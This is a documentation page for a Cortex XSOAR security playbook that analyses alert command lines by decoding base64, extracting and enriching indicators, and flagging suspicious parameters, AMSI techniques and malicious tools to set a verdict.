Skip to main content

Command-Line Analysis

This Playbook is part of the Common Playbooks Pack.#

Supported versions

Supported Cortex XSOAR versions: 6.0.0 and later.

This playbook takes the command line from the alert and performs the following actions:

  • Checks for base64 string and decodes if exists
  • Extracts and enriches indicators from the command line
  • Checks specific arguments for malicious usage

At the end of the playbook, it sets a possible verdict for the command line, based on the finding:

  1. Indicators found in the command line
  2. Found AMSI techniques
  3. Found suspicious parameters
  4. Usage of malicious tools
  5. Indication of network activity

Dependencies#

This playbook uses the following sub-playbooks, integrations, and scripts.

Sub-playbooks#

This playbook does not use any sub-playbooks.

Integrations#

This playbook does not use any integrations.

Scripts#

  • MatchRegexV2
  • Base64Decode
  • Set

Commands#

  • enrichIndicators
  • extractIndicators

Playbook Inputs#


NameDescriptionDefault ValueRequired
CommandlineThe command line.Required

Playbook Outputs#


PathDescriptionType
MatchRegexThe regex found in the command lineunknown
IndicatorsIndicators extracted from the command lineunknown
commandlineThe command lineunknown
CommandlineVerdictThe command line verdictunknown

Playbook Image#


Command-Line Analysis